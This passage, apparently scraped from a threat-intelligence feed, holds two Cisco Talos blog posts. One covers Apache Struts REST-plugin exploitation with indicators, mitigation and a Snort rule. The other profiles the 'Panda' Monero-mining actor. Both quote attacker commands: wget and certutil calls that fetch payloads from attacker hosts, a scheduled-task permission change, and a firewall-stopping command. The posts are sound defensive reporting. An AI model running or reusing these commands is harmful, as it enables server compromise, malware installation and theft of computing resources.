Below is a sample of the type of HTTP requests we have been observing.<br /><blockquote class=\"tr_bq\"><string>/bin/sh</string><string>-c</string><string>wget -qO /dev/null http://wildkind[.]ru:8082/?vulnerablesite</string></blockquote>This would initiate a wget request that would write the contents of the HTTP response to /dev/null. This indicates it is purely a scanning activity that identifies to the remote server which websites are potentially vulnerable to this attack. This is also a strong possibility since it includes the compromised website in the URL. There was one other small variation that was conducting a similar request to the same website.<br /><blockquote class=\"tr_bq\"><string>/bin/sh</string><string>-c</string><string>wget -qO /dev/null http://wildkind[.]ru:8082/?`echo ...vulnerablesite...`</string></blockquote>During our research we found that the majority of the activity was trying to POST to the path of /struts2-rest-showcase/orders/3. Additionally most of the exploitation attempts are sending the data to wildkind[.]ru, with a decent amount of the requests originating from the IP address associated with wildkind[.]ru, 188.120.246[.]215.<br /><br /><table align=\"center\" cellpadding=\"0\" cellspacing=\"0\" class=\"tr-caption-container\" style=\"margin-left: auto; margin-right: auto; text-align: center;\"><tbody><tr><td style=\"text-align: center;\"><a href=\"https://2.bp.blogspot.com/-43pwp2mOpHE/WbHJQlk9djI/AAAAAAAABTo/cc3B9_qI3U4-sU6F-Eq3Rf2MsdlzqJB8wCLcBGAs/s1600/image2.png\" imageanchor=\"1\" style=\"margin-left: auto; margin-right: auto;\"><img border=\"0\" data-original-height=\"867\" data-original-width=\"1600\" height=\"346\" src=\"https://2.bp.blogspot.com/-43pwp2mOpHE/WbHJQlk9djI/AAAAAAAABTo/cc3B9_qI3U4-sU6F-Eq3Rf2MsdlzqJB8wCLcBGAs/s640/image2.png\" width=\"640\" /></a></td></tr><tr><td class=\"tr-caption\" style=\"text-align: center;\">Example of in the wild exploitation</td></tr></tbody></table>Other exploitation attempts have been 
identified where Talos believes another threat actor appears to be exploiting the vulnerability for a different purpose. An example of the web requests found in the exploitation attempts can be found below.<br /><blockquote class=\"tr_bq\"><string>wget</string><string>hxxp://st2buzgajl.alifuzz[.]com/052</string></blockquote>Unfortunately, we were unable to retrieve the potentially malicious file that was being served at this particular location. If the previous Struts vulnerability is any indicator, the payloads could vary widely and encompass threats such as DDoS bots, spam bots, and various other malicious payloads.<br /><br /><h3 id=\"h.1teoyjf4qh2n\">IOCs</h3>IP Addresses Observed: <br /><ul><li>188.120.246[.]215</li><li>101.37.175[.]165</li><li>162.158.182[.]26</li><li>162.158.111[.]235</li><li>141.101.76[.]226</li><li>141.101.105[.]240</li></ul>Domains Contacted:<br /><ul><li>wildkind[.]ru</li><li>st2buzgajl.alifuzz[.]com</li></ul>Commonly Used Path:<br /><ul><li>/struts2-rest-showcase/orders/3</li></ul><h3 id=\"h.yv6ldyfuky10\">Mitigation</h3>Apache has released a new version of Struts that resolves this issue. If you believe that you have a potentially vulnerable version of Apache struts there are two options: upgrade to Struts 2.5.13 / Struts 2.3.34 or remove the REST plugin if it's not actively being used. Instructions to achieve this are provided as part of the <a href=\"https://cwiki.apache.org/confluence/display/WW/S2-052\">security bulletin</a> and should be reviewed and tested before applying in a production environment. In the event it's not possible to upgrade or remove the REST plugin, limiting it to server normal pages and JSONs may help limit the risk the compromise.<br /><h3 id=\"h.dp04v9qgtelp\">Conclusion</h3>This is the latest in a long line of vulnerabilities that are exposing servers to potential exploitation. 
In today's threat landscape a lot of attention is paid to endpoint systems being compromised, and with good reason, as it accounts for the majority of the malicious activity we observe on a daily basis. However, that does not imply that patching of servers should not be an extremely high priority. These types of systems, if compromised, can potentially expose critical data and systems to adversaries.<br /><br />The vulnerability is yet another example of how quickly miscreants will move to take advantage of these types of issues. Within 48 hours of disclosure we were seeing systems activity exploiting the vulnerability. To their credit the researchers disclosed the vulnerability responsibly and a patch was available before disclosure occurred. However, with money at stake bad guys worked quickly to reverse engineer the issue and successfully develop exploit code to take advantage of it. In today's reality you no longer have weeks or months to respond to these type of vulnerabilities, it's now down to days or hours and every minute counts. Ensure you have protections in place or patches applied to help prevent your enterprise from being impacted.<br /><h3 id=\"h.myaej86w3pvi\">Coverage</h3>Talos has released the following Snort rule to address this vulnerability. Please note that additional rules may be released at a future date and current rules are subject to change pending additional vulnerability information. Firepower customers should use the latest update to their ruleset by updating their SRU. 
Open Source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on <a href=\"https://snort.org/products\">Snort.org</a>.<br /><br />Snort Rule: 44315<br /><br />Network Security appliances such as <a href=\"https://www.cisco.com/c/en/us/products/security/firewalls/index.html\">NGFW</a>, <a href=\"https://www.cisco.com/c/en/us/products/security/intrusion-prevention-system-ips/index.html\">NGIPS</a>, and <a href=\"https://meraki.cisco.com/products/appliances\">Meraki MX</a> can detect malicious activity associated with this threat.<br /><br />", "cvss3": {}, "published": "2017-09-07T15:42:00", "title": "Another Apache Struts Vulnerability Under Active Exploitation", "type": "talosblog", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2017-5638", "CVE-2017-9805"], "modified": "2017-09-08T15:49:47", "href": "http://feedproxy.google.com/~r/feedburner/Talos/~3/nXfzZg_yH_w/apache-struts-being-exploited.html", "id": "TALOSBLOG:DB8F26399F12B0F9B9309365CB42D9BB", "cvss": {"score": 10.0, "vector": 
"AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-09-17T15:28:34", "description": "_By [Christopher Evans](<https://twitter.com/ccevans002>) and [David Liebenberg](<https://twitter.com/ChinaHandDave>)._ \n\n\n## \n\n\n## Executive summary\n\nA new threat actor named \"Panda\" has generated thousands of dollars worth of the Monero cryptocurrency through the use of remote access tools (RATs) and illicit cryptocurrency-mining malware. This is far from the most sophisticated actor we've ever seen, but it still has been one of the most active attackers we've seen in Cisco Talos threat trap data. Panda's willingness to persistently exploit vulnerable web applications worldwide, their tools allowing them to traverse throughout networks, and their use of RATs, means that organizations worldwide are at risk of having their system resources misused for mining purposes or worse, such as exfiltration of valuable information. \n \nPanda has shown time and again they will update their infrastructure and exploits on the fly as security researchers publicize indicators of compromises and proof of concepts. Our threat traps show that Panda uses exploits previously used by Shadow Brokers \u2014 a group infamous for publishing information from the National Security Agency \u2014 and Mimikatz, an open-source credential-dumping program. \n \nTalos first became aware of Panda in the summer of 2018, when they were engaging in the successful and widespread \"MassMiner\" campaign. Shortly thereafter, we linked Panda to another widespread illicit mining campaign with a different set of command and control (C2) servers. Since then, this actor has updated its infrastructure, exploits and payloads. We believe Panda is a legitimate threat capable of spreading cryptocurrency miners that can use up valuable computing resources and slow down networks and systems. 
Talos confirmed that organizations in the banking, healthcare, transportation, telecommunications and IT services industries were affected in these campaigns. \n \n\n\n## First sightings of the not-so-elusive Panda\n\nWe first observed this actor in July of 2018 exploiting a WebLogic vulnerability ([CVE-2017-10271](<https://nvd.nist.gov/vuln/detail/CVE-2017-10271>)) to drop a miner that was associated with a campaign called \"[MassMiner](<https://www.alienvault.com/blogs/labs-research/massminer-malware-targeting-web-servers>)\" through the wallet, infrastructure, and post-exploit PowerShell commands used. \n \nPanda used Masscan to look for a variety of different vulnerable servers and then exploited several different vulnerabilities, including the aforementioned Oracle bug and a remote code execution vulnerability in Apache Struts 2 ([CVE-2017-5638](<https://blog.talosintelligence.com/2017/03/apache-0-day-exploited.html>)). They used PowerShell post-exploit to download a miner payload called \"downloader.exe,\" saving it in the TEMP folder under a simple number filename such as \"13.exe\" and executing it. The sample attempts to download a config file from list[.]idc3389[.]top over port 57890, as well as kingminer[.]club. The config file specifies the Monero wallet to be used as well as the mining pool. In all, we estimate that Panda has amassed an amount of Monero that is currently valued at roughly $100,000. \n \nBy October 2018, the config file on list[.]idc3389[.]top, which was then an instance of an HttpFileServer (HFS), had been downloaded more than 300,000 times. 
\n \nThe sample also installs Gh0st RAT, which communicates with the domain rat[.]kingminer[.]club. In several samples, we also observed Panda dropping other hacking tools and exploits. This includes the credential-theft tool Mimikatz and UPX-packed artifacts related to the Equation Group set of exploits. The samples also appear to scan for open SMB ports by reaching out over port 445 to IP addresses in the 172.105.X.X block. \n \nOne of Panda's C2 domains, idc3389[.]top, was registered to a Chinese-speaking actor, who went by the name \"Panda.\" \n \n\n\n## Bulehero connection\n\nAround the same time that we first observed these initial Panda attacks, we observed very similar TTPs in an attack using another C2 domain: bulehero[.]in. The actors used PowerShell to download a file called \"download.exe\" from b[.]bulehero[.]in, and similarly, save it as another simple number filename such as \"13.exe\" and execute it. The file server turned out to be an instance of HFS hosting four malicious files. \n \nRunning the sample in our sandboxes, we observed several elements that connect it to the earlier MassMiner campaign. First, it issues a GET request for a file called cfg.ini hosted on a different subdomain of bulehero[.]in, c[.]bulehero[.]in, over the previously observed port 57890. Consistent with MassMiner, the config file specifies the site from which the original sample came, as well as the wallet and mining pool to be used for mining. \n \nAdditionally, the sample attempts to shut down the victim's firewall with commands such as \"cmd /c net stop MpsSvc\". The malware also modifies the access control list to grant full access to certain files through running cacls.exe. 
\n \nFor example: \n\n\n> cmd /c schtasks /create /sc minute /mo 1 /tn \"Netframework\" /ru system /tr \"cmd /c echo Y|cacls C:\\Windows\\appveif.exe /p everyone:F\n\nBoth of these behaviors have also been observed in previous MassMiner infections. \n \nThe malware also issues a GET request to the Chinese-language IP geolocation service ip138[.]com for a resource named ic.asp, which provides the machine's IP address and location in Chinese. This behavior was also observed in the MassMiner campaign. \n \nAdditionally, appveif.exe creates a number of files in the system directory. Many of these files were determined to be malicious by multiple AV engines and appear to match the exploits of vulnerabilities targeted in the MassMiner campaign. For instance, several artifacts were detected as being related to the \"Shadow Brokers\" exploits and were installed in a suspiciously named directory: \"\\Windows\\InfusedAppe\\Eternalblue139\\specials\\\". \n \n\n\n## Evolution of Panda\n\nIn January of 2019, Talos analysts observed Panda exploiting a recently disclosed vulnerability in the ThinkPHP web framework (CNVD-2018-24942) in order to spread similar malware. ThinkPHP is an open-source web framework popular in China. \n \nPanda used this vulnerability to both directly download a file called \"download.exe\" from a46[.]bulehero[.]in and upload a simple PHP web shell to the path \"/public/hydra.php\", which is subsequently used to invoke PowerShell to download the same executable file. The web shell provides only the ability to invoke arbitrary system commands through URL parameters in an HTTP request to \"/public/hydra.php\". Download.exe downloads the illicit miner payload and also engages in SMB scanning, evidence of Panda's attempt to move laterally within compromised organizations. \n \nIn March 2019, we observed the actor leveraging new infrastructure, including various subdomains of the domain hognoob[.]se. 
At the time, the domain hosting the initial payload, fid[.]hognoob[.]se, resolved to the IP address 195[.]128[.]126[.]241, which was also associated with several subdomains of bulehero[.]in. \n \nAt the time, the actor's tactics, techniques, and procedures (TTPs) remained similar to those used before. Post-exploit, Panda invokes PowerShell to download an executable called \"download.exe\" from the URL hxxp://fid[.]hognoob[.]se/download.exe and save it in the Temp folder, although Panda now saved it under a high-entropy filename, e.g., 'C:/Windows/temp/autzipmfvidixxr7407.exe'. This file then downloads a Monero mining trojan named \"wercplshost.exe\" from fid[.]hognoob[.]se as well as a configuration file called \"cfg.ini\" from uio[.]hognoob[.]se, which provides configuration details for the miner. \n \n\"Wercplshost.exe\" contains exploit modules designed for lateral movement, many of which are related to the \"Shadow Brokers\" exploits, and engages in SMB brute-forcing. The sample acquires the victim's internal IP and reaches out to Chinese-language IP geolocation site 2019[.]ip138[.]com to get the external IP, using the victim's Class B address as a basis for port scanning. It also uses the open-source tool Mimikatz to collect victim passwords. \n \nSoon thereafter, Panda began leveraging an updated payload. Some of the new features of the payload include using Certutil to download the secondary miner payload through the command: \"certutil.exe -urlcache -split -f http://fid[.]hognoob[.]se/upnpprhost.exe C:\\Windows\\Temp\\upnpprhost.exe\". The coinminer is also run using the command \"cmd /c ping 127.0.0.1 -n 5 & Start C:\\Windows\\ugrpkute\\\\[filename].exe\". \n \nThe updated payload still includes exploit modules designed for lateral movement, many of which are related to the \"Shadow Brokers\" exploits. 
One departure, however, is that previously observed samples acquire the victim's internal IP and reach out to Chinese-language IP geolocation site 2019[.]ip138[.]com to get the external IP, using the victim's Class B address as a basis for port scanning, whereas this sample installs WinPcap and the open-source tool Masscan and scans for open ports on public IP addresses, saving the results to \"Scant.txt\" (note the typo). The sample also writes a list of hardcoded IP ranges to \"ip.txt\" and passes it to Masscan to scan for port 445 and saves the results to \"results.txt.\" This is potentially intended to find machines vulnerable to MS17-010, given the actor's history of using EternalBlue. The payload also leverages previously-used tools, launching Mimikatz to collect victim passwords. \n \nIn June, Panda began targeting a newer WebLogic vulnerability, [CVE-2019-2725](<https://www.oracle.com/technetwork/security-advisory/alert-cve-2019-2725-5466295.html>), but their TTPs remained the same. \n \n\n\n## Recent activity\n\nPanda began employing new C2 and payload-hosting infrastructure over the past month. We observed several attacker IPs post-exploit pulling down payloads from the URL hxxp[:]//wiu[.]fxxxxxxk[.]me/download.exe and saving it under a random 20-character name, with the first 15 characters consisting of \"a\" - \"z\" characters and the last five consisting of digits (e.g., \"xblzcdsafdmqslz19595.exe\"). Panda then executes the file via PowerShell. Wiu[.]fxxxxxxk[.]me resolves to the IP 3[.]123[.]17[.]223, which is associated with older Panda C2s including a46[.]bulehero[.]in and fid[.]hognoob[.]se. \n \nBesides the new infrastructure, the payload is relatively similar to the one they began using in May 2019, including using Certutil to download the secondary miner payload located at hxxp[:]//wiu[.]fxxxxxxk[.]me/sppuihost.exe and using ping to delay execution of this payload. 
The sample also includes Panda's usual lateral movement modules that include Shadow Brokers' exploits and Mimikatz. \n \nOne difference is that several samples contained a Gh0st RAT default mutex \"DOWNLOAD_SHELL_MUTEX_NAME\" with the mutex name listed as fxxk[.]noilwut0vv[.]club:9898. The sample also made a DNS request for this domain. The domain resolved to the IP 46[.]173[.]217[.]80, which is also associated with several subdomains of fxxxxxxk[.]me and older Panda C2 hognoob[.]se. Combining mining capabilities and Gh0st RAT represents a return to Panda's earlier behavior. \n \nOn August 19, 2019, we observed that Panda has added another set of domains to his inventory of C2 and payload-hosting infrastructure. In line with his previous campaigns, we observed multiple attacker IPs pulling down payloads from the URL hxxp[:]//cb[.]f*ckingmy[.]life/download.exe. In a slight departure from previous behavior, the file was saved as \"BBBBB\" instead of as a random 20-character name. cb[.]f*ckingmy[.]life (URL censored due to inappropriate language) currently resolves to the IP 217[.]69[.]6[.]42, and was first observed by Cisco Umbrella on August 18. \n \nIn line with previous samples Talos has analyzed over the summer, the initial payload uses Certutil to download the secondary miner payload located at http[:]//cb[.]fuckingmy[.]life:80/trapceapet.exe. This sample also includes a Gh0st RAT mutex, set to \"oo[.]mygoodluck[.]best:51888:WervPoxySvc\", and made a DNS request for this domain. The domain resolved to 46[.]173[.]217[.]80, which hosts a number of subdomains of fxxxxxxk[.]me and hognoob[.]se, both of which are known domains used by Panda. The sample also contacted li[.]bulehero2019[.]club. \n \nCisco Threat Grid's analysis also showed artifacts associated with Panda's typical lateral movement tools that include Shadow Brokers exploits and Mimikatz. 
The INI file used for miner configuration lists the mining pool as mi[.]oops[.]best, with a backup pool at mx[.]oops[.]best. \n \n\n\n## Conclusion\n\nPanda's operational security remains poor, with many of their old and current domains all hosted on the same IP and their TTPs remaining relatively similar throughout campaigns. The payloads themselves are also not very sophisticated. \n \nHowever, system administrators and researchers should never underestimate the damage an actor can do with widely available tools such as Mimikatz. Some information from HFS used by Panda shows that this malware had a wide reach, and rough calculations on the amount of Monero generated show they made around 1,215 XMR in profits through their malicious activities, which today equals around $100,000, though the amount of realized profits is dependent on the time they sold. \n \nPanda remains one of the most consistent actors engaging in illicit mining attacks and frequently shifts the infrastructure used in their attacks. They also frequen